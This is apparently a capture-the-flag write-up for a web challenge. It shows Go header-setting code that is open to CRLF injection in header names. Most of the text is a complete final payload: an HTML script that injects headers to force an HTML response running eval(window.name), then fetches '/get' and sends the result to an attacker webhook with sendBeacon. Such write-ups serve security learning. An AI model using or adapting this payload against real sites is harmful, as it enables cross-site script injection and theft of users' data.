In this challenge, the XSS bug is removed and the Header setting part gets weird.

```go
for v, d := range param {
for _, k := range d {

if regexp.MustCompile("^[a-zA-Z0-9{}_;-]*$").MatchString(k) && len(d) < 5 {
w.Header().Set(v, k)
}
break
}
break
}
```
In, Notepad 1, the `Header name` was compared with a regex, but in this challenge, only the value is compared with a regex. With a bit of testing, one can understand that `Header().Set()` is vulnerable to a CRLF bug in the name parameter. Final payload that can be used is

```html
<script>
window.open("http://chall.notepad15.gq/find?startsWith=asd&debug=2&A:asd%0AContent-Type:text/html%0A%0A%3Chtml%3E%3Cscript%3Eeval(window.name)%3C/script%3E", name=`fetch('/get').then(response=>response.text()).then(data=>navigator.sendBeacon('${webhook}',data))`)
</script>
```